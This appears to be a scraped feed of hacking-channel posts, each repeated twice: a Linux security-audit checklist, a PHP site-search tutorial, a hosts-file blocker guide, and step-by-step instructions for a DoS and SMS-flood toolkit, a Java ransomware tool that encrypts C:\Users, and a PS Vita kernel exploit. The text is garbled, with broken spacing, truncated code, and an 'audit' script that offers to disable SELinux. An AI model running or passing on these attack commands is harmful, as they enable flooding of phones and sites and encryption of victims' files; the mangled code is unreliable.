β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Checking the system logs :
During the audit, you need to make sure that the daemon is running Syslog , and all significant events occurring in the system are recorded in event logs. During the audit, it is also necessary to make sure that the policy for storing event logs takes into account the requirements of current legislation and the security policy
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Event logs on Linux:
/var/log/auth.log - log of the authorization system (logins and authentication mechanism).
/var/log/dpkg.log - install / uninstall packages log using dpkg.
/var/log/yum.log - package installation / removal log using yum.
/ var / log / faillog - a log of unsuccessful login attempts and their limit for each account.
/var/log/kern.log - kernel log, (a detailed log of messages from the Linux kernel).
/ var / log / maillog or /var/log/mail.log - mail server log.
/ var / log / wtmp - log-in system (registration time and duration of all users of the system).
/ var / run / utmp - information about the users currently logged in to the system.
/ var / log / lastlog - records of previous logins.
/ var / log / boot - information that is logged during system boot
2) Protecting system files
> GRUB bootloader protection
To protect the GRUB bootloader, the administrator must use password encryption in MD5 format :
[root @ machine ~] # grub-md5-crypt
3) After executing the command, the administrator needs to open the file /boot/grub/menu.lst or /boot/grub/grub.conf and add the MD5 password:
[root @ machine ~] # vi /boot/grub/menu.lst
or
[root @ machine ~] # vi /boot/grub/grub.conf
4) The newly created MD5 password can be added to the GRUB configuration file.
5) Protecting the boot directory / BOOT
During the audit, it is necessary to check the status of the / boot directory , since the kernel of the system and related files are located in the / boot directory . You need to make sure that this directory is allowed read-only access, which prevents unauthorized changes to important files in the system. To check, open the / etc / fstab file and check the configuration:
# vi / etc / fstab
6) The file should contain the line:
LABEL = / boot / boot ext2 defaults, ro 1 2
7) Checking open ports and active connections
The following script can be used to check services running on the system:
#! / bin / bash
if (($ (ps -ef | grep -v grep | grep $ service | wc -l)> 0))
then
echo β$ service is running !!!β
else
/etc/init.d/$service start
Fi
π¦ View network connections
# netstat -anop
or
# lsof -i (lsof -ni)
or
# iptraf
8) Listened ports
Using the Netstat command, you can view all open ports and their associated commands. Example script:
# netstat β tulpn
A script for port scanning is:
scan () {
if [[-z $ 1 || -z $ 2]]; then
echo βUsage: $ 0 <host> <port, ports, or port-range>β
return
fi
local host = $ 1
local ports = ()
case $ 2 in
* - *)
IFS = - read start end <<< β$ 2β
for ((port = start; port <= end; port ++)); do
ports + = ($ port)
done
;;
*, *)
IFS =, read -ra ports <<< β$ 2β
;; *)
ports + = ($ 2) ;;
esac
for port in β$ {ports [@]}β; do
alarm 1 βecho> / dev / tcp / $ host / $ portβ &&
echo βport $ port is openβ ||
echo βport $ port is closedβ
done
}
9) iptables firewall
During the audit, it is necessary to check the configuration of the Linux firewall to prevent unauthorized access. To control traffic, rules should be created in iptables that will filter incoming, outgoing and forwarded packets taking into account the IP address and TCP / UDP port number.
# iptables -n -L -v --line-numbers
ICMP / broadcast requests
10) During the audit, you must verify that the systems are configured to ignore ping and broadcast requests. To do this, make sure that the following lines are added to the β/etc/sysctl.confβ file :
# ignore ICMP requests:
net.ipv4.icmp_echo_ignore_all = 1
# ignore broadcast requests:
net.ipv4.icmp_echo_ignore_broadcasts = 1
11) Checking installed updates
The latest updates must be installed on the systems:
# yum updates
# yum check-update
π¦ Checking the system logs :
During the audit, you need to make sure that the daemon is running Syslog , and all significant events occurring in the system are recorded in event logs. During the audit, it is also necessary to make sure that the policy for storing event logs takes into account the requirements of current legislation and the security policy
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Event logs on Linux:
/var/log/auth.log - log of the authorization system (logins and authentication mechanism).
/var/log/dpkg.log - install / uninstall packages log using dpkg.
/var/log/yum.log - package installation / removal log using yum.
/ var / log / faillog - a log of unsuccessful login attempts and their limit for each account.
/var/log/kern.log - kernel log, (a detailed log of messages from the Linux kernel).
/ var / log / maillog or /var/log/mail.log - mail server log.
/ var / log / wtmp - log-in system (registration time and duration of all users of the system).
/ var / run / utmp - information about the users currently logged in to the system.
/ var / log / lastlog - records of previous logins.
/ var / log / boot - information that is logged during system boot
2) Protecting system files
> GRUB bootloader protection
To protect the GRUB bootloader, the administrator must use password encryption in MD5 format :
[root @ machine ~] # grub-md5-crypt
3) After executing the command, the administrator needs to open the file /boot/grub/menu.lst or /boot/grub/grub.conf and add the MD5 password:
[root @ machine ~] # vi /boot/grub/menu.lst
or
[root @ machine ~] # vi /boot/grub/grub.conf
4) The newly created MD5 password can be added to the GRUB configuration file.
5) Protecting the boot directory / BOOT
During the audit, it is necessary to check the status of the / boot directory , since the kernel of the system and related files are located in the / boot directory . You need to make sure that this directory is allowed read-only access, which prevents unauthorized changes to important files in the system. To check, open the / etc / fstab file and check the configuration:
# vi / etc / fstab
6) The file should contain the line:
LABEL = / boot / boot ext2 defaults, ro 1 2
7) Checking open ports and active connections
The following script can be used to check services running on the system:
#! / bin / bash
if (($ (ps -ef | grep -v grep | grep $ service | wc -l)> 0))
then
echo β$ service is running !!!β
else
/etc/init.d/$service start
Fi
π¦ View network connections
# netstat -anop
or
# lsof -i (lsof -ni)
or
# iptraf
8) Listened ports
Using the Netstat command, you can view all open ports and their associated commands. Example script:
# netstat β tulpn
A script for port scanning is:
scan () {
if [[-z $ 1 || -z $ 2]]; then
echo βUsage: $ 0 <host> <port, ports, or port-range>β
return
fi
local host = $ 1
local ports = ()
case $ 2 in
* - *)
IFS = - read start end <<< β$ 2β
for ((port = start; port <= end; port ++)); do
ports + = ($ port)
done
;;
*, *)
IFS =, read -ra ports <<< β$ 2β
;; *)
ports + = ($ 2) ;;
esac
for port in β$ {ports [@]}β; do
alarm 1 βecho> / dev / tcp / $ host / $ portβ &&
echo βport $ port is openβ ||
echo βport $ port is closedβ
done
}
9) iptables firewall
During the audit, it is necessary to check the configuration of the Linux firewall to prevent unauthorized access. To control traffic, rules should be created in iptables that will filter incoming, outgoing and forwarded packets taking into account the IP address and TCP / UDP port number.
# iptables -n -L -v --line-numbers
ICMP / broadcast requests
10) During the audit, you must verify that the systems are configured to ignore ping and broadcast requests. To do this, make sure that the following lines are added to the β/etc/sysctl.confβ file :
# ignore ICMP requests:
net.ipv4.icmp_echo_ignore_all = 1
# ignore broadcast requests:
net.ipv4.icmp_echo_ignore_broadcasts = 1
11) Checking installed updates
The latest updates must be installed on the systems:
# yum updates
# yum check-update
12) Checking CRON Jobs Automatically
The auditor should check who is allowed and forbidden to perform tasks in cron. Access to cron is controlled using the /etc/cron.allow and /etc/cron.deny files .
# echo ALL >> / etc / cron.deny
13) Checking SELINUX Forced Security
During the audit, it is important to check the status of SELinux . This mechanism must be enabled in the system.
There are three SELinux modes :
Enforcing: SELinux policy is enforced. SELinux denies access based on SELinux policy rules.
Permissive: SELinux policy is not forced. SELinux does not block access, but bans are logged as actions that would be banned if the policy were enforced.
Disabled: SELinux is disabled. Only discrete DAC rules are used.
During the audit, you can use the following script to check SELinux status or use the system-configselinux, getenforce, or sestatus commands:
ENABLED =
if [β $ ENABLED β== 1]; then
echo βSELinux is enabled, disable? (yes / no): β
read disable
if [$ disable ==β yes β]; then
echo βdisabling selinuxβ
setenforce 0
fi
fi
π¦ LBSA script for checking basic security options
LBSA (Linux Basic Security Audit script) is a basic security configuration audit script for Linux systems. The script should be run from the command line with root privileges , or ideally run on a schedule on a regular basis using the cron scheduler to systematically check configuration changes.
Β» The purpose of this script is an express audit of security settings and uploading a report with a description of possible parameters that can be changed to provide a higher degree of security. In the case, if there are no recommendations for any option, the script simply displays one line with working out the check, and the final decision is always up to the administrator. Before starting the test, the developers strongly recommend that you read the manual and study the recommended sections for more information.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
The auditor should check who is allowed and forbidden to perform tasks in cron. Access to cron is controlled using the /etc/cron.allow and /etc/cron.deny files .
# echo ALL >> / etc / cron.deny
13) Checking SELINUX Forced Security
During the audit, it is important to check the status of SELinux . This mechanism must be enabled in the system.
There are three SELinux modes :
Enforcing: SELinux policy is enforced. SELinux denies access based on SELinux policy rules.
Permissive: SELinux policy is not forced. SELinux does not block access, but bans are logged as actions that would be banned if the policy were enforced.
Disabled: SELinux is disabled. Only discrete DAC rules are used.
During the audit, you can use the following script to check SELinux status or use the system-configselinux, getenforce, or sestatus commands:
ENABLED =
cat / selinux / enforceif [β $ ENABLED β== 1]; then
echo βSELinux is enabled, disable? (yes / no): β
read disable
if [$ disable ==β yes β]; then
echo βdisabling selinuxβ
setenforce 0
fi
fi
π¦ LBSA script for checking basic security options
LBSA (Linux Basic Security Audit script) is a basic security configuration audit script for Linux systems. The script should be run from the command line with root privileges , or ideally run on a schedule on a regular basis using the cron scheduler to systematically check configuration changes.
Β» The purpose of this script is an express audit of security settings and uploading a report with a description of possible parameters that can be changed to provide a higher degree of security. In the case, if there are no recommendations for any option, the script simply displays one line with working out the check, and the final decision is always up to the administrator. Before starting the test, the developers strongly recommend that you read the manual and study the recommended sections for more information.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 sms attack tools :
>Quack Toolkit is a set of tools for performing a denial of service attacks. Quack Toolkit includes SMS attack tool, HTTP attack tool and many other attack tools.
fb.com/UndercOdeTestingCompany
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/entynetproject/quack
2) cd quack
3) chmod +x install.sh
4) ./install.sh
5) Quack Toolkit execution
quack -h
6) usage: quack [-h] [--target <IP:port/URL/phone>]
[--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]]
[--timeout <timeout>] [--threads <threads>] [-u]
7) optional arguments:
-h, --help show this help message and exit
--target <IP:port/URL/phone>
Target IP:port, URL or phone.
--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]
Attack tool.
--timeout <timeout> Timeout in secounds.
--threads <threads> Threads count.
-u, --update Update Quack Toolkit.
Quack Toolkit examples
Example of the SMS attack:
quack --tool SMS --target 15554443333 --time 10 --threads 10
Example of the HTTP attack:
quack --tool HTTP --target http://example.com/ --time 10 --threads 10
Example of the TCP attack:
quack --tool TCP --target 192.168.1.100:80 --time 10 --threads 10
Tested by UndercOde
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 sms attack tools :
>Quack Toolkit is a set of tools for performing a denial of service attacks. Quack Toolkit includes SMS attack tool, HTTP attack tool and many other attack tools.
fb.com/UndercOdeTestingCompany
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/entynetproject/quack
2) cd quack
3) chmod +x install.sh
4) ./install.sh
5) Quack Toolkit execution
quack -h
6) usage: quack [-h] [--target <IP:port/URL/phone>]
[--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]]
[--timeout <timeout>] [--threads <threads>] [-u]
7) optional arguments:
-h, --help show this help message and exit
--target <IP:port/URL/phone>
Target IP:port, URL or phone.
--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]
Attack tool.
--timeout <timeout> Timeout in secounds.
--threads <threads> Threads count.
-u, --update Update Quack Toolkit.
Quack Toolkit examples
Example of the SMS attack:
quack --tool SMS --target 15554443333 --time 10 --threads 10
Example of the HTTP attack:
quack --tool HTTP --target http://example.com/ --time 10 --threads 10
Example of the TCP attack:
quack --tool TCP --target 192.168.1.100:80 --time 10 --threads 10
Tested by UndercOde
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Build your own site search engine-Website tutorial by Underc0de :
pinterest.com/UndercOdeOfficial
π¦LETS START:
> Before you write a program, you must think of an idea. The following is my idea. Maybe anyone has a better idea, but note that this is just a method issue: iterate through all files? Read content? Search keywords, if they match, put them into an array.
> Before implementing these steps, I assume that your web pages are standard, that is, there are titles (<title> </ title>) and (<bod *> </ body>), if you are designing with dreamweaver or frontpage , Then unless you deliberately delete them, they all exist. Let's step by step to complete and improve this search engine in the project.
1) F1rst, design the search form
Create a search.htm in the root directory of the website, the content is as follows:
<html>
<head>
<title> Search form </ title>
<meta http-equiv = "Content-Type" content = "text / html; charset = gb2312 ">
</ head>
<body bgcolor =" # FFFFFF "text =" # 000000 ">
<form name =" form1 "method ="
<tr>
<td width = "36%">
<div align = "center">
<input type = "text" name = "keyword">
</ div>
</ td>
<td width = "64%">
<input type = "submit" name = "Submit" value = "Search">
</ td>
</ tr>
</ table>
</ form>
</ body>
</ html>
2) Second, the search program
is in the root directory Create a search.php file to process the data from the search.htm form. The content is as follows:
<? Php
// Get search keywords
$ keyword = trim ( $ _POST [ βkeywordβ ]);
// Check if it is empty
if ( $ keyword == ββ ) {
echo βThe keyword you are searching for cannot be emptyβ ;
exit; // End the program
}
?>
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Build your own site search engine-Website tutorial by Underc0de :
pinterest.com/UndercOdeOfficial
π¦LETS START:
> Before you write a program, you must think of an idea. The following is my idea. Maybe anyone has a better idea, but note that this is just a method issue: iterate through all files? Read content? Search keywords, if they match, put them into an array.
> Before implementing these steps, I assume that your web pages are standard, that is, there are titles (<title> </ title>) and (<bod *> </ body>), if you are designing with dreamweaver or frontpage , Then unless you deliberately delete them, they all exist. Let's step by step to complete and improve this search engine in the project.
1) F1rst, design the search form
Create a search.htm in the root directory of the website, the content is as follows:
<html>
<head>
<title> Search form </ title>
<meta http-equiv = "Content-Type" content = "text / html; charset = gb2312 ">
</ head>
<body bgcolor =" # FFFFFF "text =" # 000000 ">
<form name =" form1 "method ="
<tr>
<td width = "36%">
<div align = "center">
<input type = "text" name = "keyword">
</ div>
</ td>
<td width = "64%">
<input type = "submit" name = "Submit" value = "Search">
</ td>
</ tr>
</ table>
</ form>
</ body>
</ html>
2) Second, the search program
is in the root directory Create a search.php file to process the data from the search.htm form. The content is as follows:
<? Php
// Get search keywords
$ keyword = trim ( $ _POST [ βkeywordβ ]);
// Check if it is empty
if ( $ keyword == ββ ) {
echo βThe keyword you are searching for cannot be emptyβ ;
exit; // End the program
}
?>
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ part 2 - Build your own site search engine
This way, if the keyword entered by the visitor is empty, a prompt can be made. Here is iterating through all the files.
twitter.com/UndercOdeTC
1) We can iterate through all the files recursively, using the functions opendir, readdir, or PHP Directory classes. We now use the former.
<PHP?
// function to traverse all files
function listFiles ( $ dir ) {
$ handle = opendir ( $ dir );
the while ( false ! == ( $ File = readdir ( $ handle ))) {
IF ( $ file ! = "." && $ file ! = ".." ) {
// If it is a directory, continue searching
if ( is_dir ( "$ dir / $ file" )) {
listFiles ( "$ dir / $ file" );
}
else {
// Process it here
}
}
}
}
?>
2) In the red text place, we can read and process the searched file. The following is the content of the read file And check whether the content contains the keyword $ keyword, if it contains, the file address is assigned to an array.
<? php
// $ dir is the search directory, $ keyword is the search keyword, and $ array is the array to store
3) function listFiles ( $ dir , $ keyword , & $ array ) (
$ handle = opendir ( $ dir );
while ( false ! == ( $ file = readdir ( $ handle ))) {
if ( $ file!="."&&$file!=".."){
if(is_dir("$dir/$file")){
listFiles("$dir/$file",$keyword,$array);
}
else{
//@undercodeofficial
$data=fread(fopen("$dir/$file","r"),filesize("$dir/$file"));
if($file!=βsearch.phpβ){
if(Now combine this result with the program at the beginning, enter a keyword, and you will find that relevant results in your website are searched out. We are perfecting it now.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ part 2 - Build your own site search engine
This way, if the keyword entered by the visitor is empty, a prompt can be made. Here is iterating through all the files.
twitter.com/UndercOdeTC
1) We can iterate through all the files recursively, using the functions opendir, readdir, or PHP Directory classes. We now use the former.
<PHP?
// function to traverse all files
function listFiles ( $ dir ) {
$ handle = opendir ( $ dir );
the while ( false ! == ( $ File = readdir ( $ handle ))) {
IF ( $ file ! = "." && $ file ! = ".." ) {
// If it is a directory, continue searching
if ( is_dir ( "$ dir / $ file" )) {
listFiles ( "$ dir / $ file" );
}
else {
// Process it here
}
}
}
}
?>
2) In the red text place, we can read and process the searched file. The following is the content of the read file And check whether the content contains the keyword $ keyword, if it contains, the file address is assigned to an array.
<? php
// $ dir is the search directory, $ keyword is the search keyword, and $ array is the array to store
3) function listFiles ( $ dir , $ keyword , & $ array ) (
$ handle = opendir ( $ dir );
while ( false ! == ( $ file = readdir ( $ handle ))) {
if ( $ file!="."&&$file!=".."){
if(is_dir("$dir/$file")){
listFiles("$dir/$file",$keyword,$array);
}
else{
//@undercodeofficial
$data=fread(fopen("$dir/$file","r"),filesize("$dir/$file"));
if($file!=βsearch.phpβ){
if(Now combine this result with the program at the beginning, enter a keyword, and you will find that relevant results in your website are searched out. We are perfecting it now.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Automate process invoke extensions to block additional sites by category.
> Extending and consolidating hosts files from several well-curated sources like adaway .org, mvps. org, malwaredomainlist. com, someonewhocares. org, and potentially others. You can optionally
pinterest.com/UndercOdeOfficial
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/StevenBlack/hosts
2) cd hosts
3) pip3 install --user -r requirements.txt
4) python3 updateHostsFile.py [--auto] [--replace] [--ip nnn.nnn.nnn.nnn] [--extensions ext1 ext2 ext3]
π¦Commands :
>--help, or -h: display help.
--auto, or -a: run the script without prompting. When --auto is invoked,
Hosts data sources, including extensions, are updated.
No extensions are included by default. Use the --extensions or -e flag to include any you want.
Your active hosts file is not replaced unless you include the --replace flag.
--backup, or -b: Make a backup of existing hosts file(s) as you generate over them.
--extensions <ext1> <ext2> <ext3>, or -e <ext1> <ext2> <ext3>: the names of subfolders below the extensions folder containing additional category-specific hosts files to include in the amalgamation. Example: --extensions porn or -e social porn.
--flush-dns-cache, or -f: skip the prompt for flushing the DNS cache. Only active when --replace is also active.
--ip nnn.nnn.nnn.nnn, or -i nnn.nnn.nnn.nnn: the IP address to use as the target. Default is 0.0.0.0.
--keepdomaincomments, or -k: true (default) or false, keep the comments that appear on the same line as domains. The default is true.
--noupdate, or -n: skip fetching updates from hosts data sources.
--output <subfolder>, or -o <subfolder>: place the generated source file in a subfolder. If the subfolder does not exist, it will be created.
--replace, or -r: trigger replacing your active hosts
--skipstatichosts, or -s: false (default) or true, omit the standard section at the top, containing lines like 127.0.0.1 localhost. This is useful for configuring proximate DNS services on the local network.
--compress, or -c: false (default) or true, Compress the hosts file ignoring non-necessary lines (empty lines and comments) and putting multiple domains in each line. Reducing the number of lines of the hosts file improves the performances under Windows (with DNS Client service enabled).
--minimise, or -m: false (default) or true, like --compress, but puts each domain on a separate line. This is necessary because many implementations of URL blockers that rely on hosts files do not conform to the standard which allows multiple hosts on a single line.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Automate process invoke extensions to block additional sites by category.
> Extending and consolidating hosts files from several well-curated sources like adaway .org, mvps. org, malwaredomainlist. com, someonewhocares. org, and potentially others. You can optionally
pinterest.com/UndercOdeOfficial
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/StevenBlack/hosts
2) cd hosts
3) pip3 install --user -r requirements.txt
4) python3 updateHostsFile.py [--auto] [--replace] [--ip nnn.nnn.nnn.nnn] [--extensions ext1 ext2 ext3]
π¦Commands :
>--help, or -h: display help.
--auto, or -a: run the script without prompting. When --auto is invoked,
Hosts data sources, including extensions, are updated.
No extensions are included by default. Use the --extensions or -e flag to include any you want.
Your active hosts file is not replaced unless you include the --replace flag.
--backup, or -b: Make a backup of existing hosts file(s) as you generate over them.
--extensions <ext1> <ext2> <ext3>, or -e <ext1> <ext2> <ext3>: the names of subfolders below the extensions folder containing additional category-specific hosts files to include in the amalgamation. Example: --extensions porn or -e social porn.
--flush-dns-cache, or -f: skip the prompt for flushing the DNS cache. Only active when --replace is also active.
--ip nnn.nnn.nnn.nnn, or -i nnn.nnn.nnn.nnn: the IP address to use as the target. Default is 0.0.0.0.
--keepdomaincomments, or -k: true (default) or false, keep the comments that appear on the same line as domains. The default is true.
--noupdate, or -n: skip fetching updates from hosts data sources.
--output <subfolder>, or -o <subfolder>: place the generated source file in a subfolder. If the subfolder does not exist, it will be created.
--replace, or -r: trigger replacing your active hosts
--skipstatichosts, or -s: false (default) or true, omit the standard section at the top, containing lines like 127.0.0.1 localhost. This is useful for configuring proximate DNS services on the local network.
--compress, or -c: false (default) or true, Compress the hosts file ignoring non-necessary lines (empty lines and comments) and putting multiple domains in each line. Reducing the number of lines of the hosts file improves the performances under Windows (with DNS Client service enabled).
--minimise, or -m: false (default) or true, like --compress, but puts each domain on a separate line. This is necessary because many implementations of URL blockers that rely on hosts files do not conform to the standard which allows multiple hosts on a single line.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ JavaRansomware
Ransomware is malware for data kidnapping, an exploit in which the attacker encrypts the victim's dataRansomware stops you from using your PC.Ransomware spreads through e-mail attachments, infected programs and compromised websites. A ransomware malware program may also be called a cryptovirus, cryptotrojan or cryptoworm It holds your PC or files for "ransom".
T.me/UndercOdeTesting
π¦FEATURES :
Ransomware can:
1) Prevent you from accessing Windows.
2) Encrypt files so you can't use them.
3) Stop certain apps from running (like your web browser).
4) Ransomware will demand that you pay money (a βransomβ) to get access to your PC or files. We have also seen them make you complete surveys.
5) There is no guarantee that paying the fine or doing what the ransomware tells you will give access to your PC or files again.
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/PanagiotisDrakatos/JavaRansomware
2) $ cd JarPath
Encrypt All Files in the Current Path wait until the execution will be finished
3) $ java -jar JavaRansomware.jar C:\Users Encrypt
Decrypt All Files in the Current Path wait until the execution will be finished
4) $ java -jar JavaRansomware.jar C:\Users Decrypt
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ JavaRansomware
Ransomware is malware for data kidnapping, an exploit in which the attacker encrypts the victim's dataRansomware stops you from using your PC.Ransomware spreads through e-mail attachments, infected programs and compromised websites. A ransomware malware program may also be called a cryptovirus, cryptotrojan or cryptoworm It holds your PC or files for "ransom".
T.me/UndercOdeTesting
π¦FEATURES :
Ransomware can:
1) Prevent you from accessing Windows.
2) Encrypt files so you can't use them.
3) Stop certain apps from running (like your web browser).
4) Ransomware will demand that you pay money (a βransomβ) to get access to your PC or files. We have also seen them make you complete surveys.
5) There is no guarantee that paying the fine or doing what the ransomware tells you will give access to your PC or files again.
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/PanagiotisDrakatos/JavaRansomware
2) $ cd JarPath
Encrypt All Files in the Current Path wait until the execution will be finished
3) $ java -jar JavaRansomware.jar C:\Users Encrypt
Decrypt All Files in the Current Path wait until the execution will be finished
4) $ java -jar JavaRansomware.jar C:\Users Decrypt
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Updated Fully chained kernel exploit for the PS Vita on firmwares 3.65-3.68
Instagram.com/underCodeTestingCompany
π¦ Requirements
1) Your device must be on firmware 3.65, 3.67 or 3.68. Firmware 3.69 and higher are not supported. If you're on a lower firmware, please decide carefully to what firmware you want to update, then search for a trustable guide on /r/vitahacks.
2) If your device is a phat OLED model, you need a Memory Card in order to install. There's no need for a Memory Card on Slim/PS TV models, since they already provide an Internal Storage. Make sure you have got at least 270 MB of free space.
3) Your device must be linked to any PSN account (it doesn't need to be activated though). If it is not, then you must restore default settings in order to sign in.
π¦πβπππΈπππππΈπππβ & βπβ:
1) download https://github.com/TheOfficialFloW/h-encore/releases/download/v2.0/h-encore.zip
> extract
2) ownload and install qcma, psvimgtools and pkg2zip (check the releases section for the binaries).
If you don't know where to put psvimgtools and pkg2zip binaries, just put them in the h-encore folder.
>> https://codestation.github.io/qcma/
> https://github.com/yifanlu/psvimgtools
> https://github.com/mmozeiko/pkg2zip
3) Download the vulnerable DRM-free demo of bitter smile (yes, that's the user entry point).
> http://ares.dl.playstation.net/cdn/JP0741/PCSG90096_00/xGMrXOkORxWRyqzLMihZPqsXAbAXLzvAdJFqtPJLAZTgOcqJobxQAhLNbgiFydVlcmVOrpZKklOYxizQCRpiLfjeROuWivGXfwgkq.pkg
4) Extract the demo using this command in terminal/cmd:
pkg2zip -x PATH_OF_PKG
This will output the files to app/PCSG90096.
5) Copy the contents of the output app/PCSG90096 to the folder h-encore/app/ux0_temp_game_PCSG90096_app_PCSG90096 (such that the files eboot.bin and VITA_PATH.TXT are within the same folder).
6) Copy the license file app/PCSG90096/sce_sys/package/temp.bin to the folder
h-encore/license/ux0_temp_game_PCSG90096_license_app_PCSG90096 and rename the just pasted file temp.bin to 6488b73b912a753a492e2714e9b38bc7.rif. Be careful with the file extension, it should not be .rif.bin. Again, this file should be in the same folder as VITA_PATH.TXT.
7) Start qcma and within the qcma settings set the option Use this version for updates to FW 0.00 (Always up-to-date) to spoof the System Software check.
8) Launch Content Manager on your PS Vita and connect it to your computer, where you then need to select PC -> PS Vita System, and after that you select Applications. If you see an error message about System Software, you should simply reboot your device to solve it (if this doesn't solve, then put your device into airplane mode and reboot). If this does still not work, then alternatively set DNS to 212.47.229.76 to block updates. This should create a folder at PS Vita/APP/xxxxxxxxxxxxxxxx on your computer (see qcma settings where this folder is), where the folder xxxxxxxxxxxxxxxx represents the AID (account ID that is 16 characters long) that you need to insert here. If the AID is valid, it will yield a key that you can now use to encrypt the demo.
9) Change directory to the h-encore folder in terminal/cmd and use the key to encrypt all folders using (make sure you don't confuse the key with the AID, the key is 64 characters long!):
psvimg-create -n app -K YOUR_KEY app PCSG90096/app
psvimg-create -n appmeta -K YOUR_KEY appmeta PCSG90096/appmeta
psvimg-create -n license -K YOUR_KEY license PCSG90096/license
psvimg-create -n savedata -K YOUR_KEY savedata PCSG90096/savedata
10) The folder h-encore/PCSG90096 should then contain sce_sys and all 4 folders from above, and within these folders you should find files called X.psvimg and X.psvmd, where X has the same name as the folder. Backup this folder, since if everything has been done correctly, you don't need to redo all the steps to install it onto another device with the same PSN account.
11) Copy the folder h-encore/PCSG90096 to PS Vita/APP/xxxxxxxxxxxxxxxx/PCSG90096 and then select Refresh database in qcma.
π¦Updated Fully chained kernel exploit for the PS Vita on firmwares 3.65-3.68
Instagram.com/underCodeTestingCompany
π¦ Requirements
1) Your device must be on firmware 3.65, 3.67 or 3.68. Firmware 3.69 and higher are not supported. If you're on a lower firmware, please decide carefully to what firmware you want to update, then search for a trustable guide on /r/vitahacks.
2) If your device is a phat OLED model, you need a Memory Card in order to install. There's no need for a Memory Card on Slim/PS TV models, since they already provide an Internal Storage. Make sure you have got at least 270 MB of free space.
3) Your device must be linked to any PSN account (it doesn't need to be activated though). If it is not, then you must restore default settings in order to sign in.
π¦πβπππΈπππππΈπππβ & βπβ:
1) download https://github.com/TheOfficialFloW/h-encore/releases/download/v2.0/h-encore.zip
> extract
2) ownload and install qcma, psvimgtools and pkg2zip (check the releases section for the binaries).
If you don't know where to put psvimgtools and pkg2zip binaries, just put them in the h-encore folder.
>> https://codestation.github.io/qcma/
> https://github.com/yifanlu/psvimgtools
> https://github.com/mmozeiko/pkg2zip
3) Download the vulnerable DRM-free demo of bitter smile (yes, that's the user entry point).
> http://ares.dl.playstation.net/cdn/JP0741/PCSG90096_00/xGMrXOkORxWRyqzLMihZPqsXAbAXLzvAdJFqtPJLAZTgOcqJobxQAhLNbgiFydVlcmVOrpZKklOYxizQCRpiLfjeROuWivGXfwgkq.pkg
4) Extract the demo using this command in terminal/cmd:
pkg2zip -x PATH_OF_PKG
This will output the files to app/PCSG90096.
5) Copy the contents of the output app/PCSG90096 to the folder h-encore/app/ux0_temp_game_PCSG90096_app_PCSG90096 (such that the files eboot.bin and VITA_PATH.TXT are within the same folder).
6) Copy the license file app/PCSG90096/sce_sys/package/temp.bin to the folder
h-encore/license/ux0_temp_game_PCSG90096_license_app_PCSG90096 and rename the just pasted file temp.bin to 6488b73b912a753a492e2714e9b38bc7.rif. Be careful with the file extension, it should not be .rif.bin. Again, this file should be in the same folder as VITA_PATH.TXT.
7) Start qcma and within the qcma settings set the option Use this version for updates to FW 0.00 (Always up-to-date) to spoof the System Software check.
8) Launch Content Manager on your PS Vita and connect it to your computer, where you then need to select PC -> PS Vita System, and after that you select Applications. If you see an error message about System Software, you should simply reboot your device to solve it (if this doesn't solve, then put your device into airplane mode and reboot). If this does still not work, then alternatively set DNS to 212.47.229.76 to block updates. This should create a folder at PS Vita/APP/xxxxxxxxxxxxxxxx on your computer (see qcma settings where this folder is), where the folder xxxxxxxxxxxxxxxx represents the AID (account ID that is 16 characters long) that you need to insert here. If the AID is valid, it will yield a key that you can now use to encrypt the demo.
9) Change directory to the h-encore folder in terminal/cmd and use the key to encrypt all folders using (make sure you don't confuse the key with the AID, the key is 64 characters long!):
psvimg-create -n app -K YOUR_KEY app PCSG90096/app
psvimg-create -n appmeta -K YOUR_KEY appmeta PCSG90096/appmeta
psvimg-create -n license -K YOUR_KEY license PCSG90096/license
psvimg-create -n savedata -K YOUR_KEY savedata PCSG90096/savedata
10) The folder h-encore/PCSG90096 should then contain sce_sys and all 4 folders from above, and within these folders you should find files called X.psvimg and X.psvmd, where X has the same name as the folder. Backup this folder, since if everything has been done correctly, you don't need to redo all the steps to install it onto another device with the same PSN account.
11) Copy the folder h-encore/PCSG90096 to PS Vita/APP/xxxxxxxxxxxxxxxx/PCSG90096 and then select Refresh database in qcma.
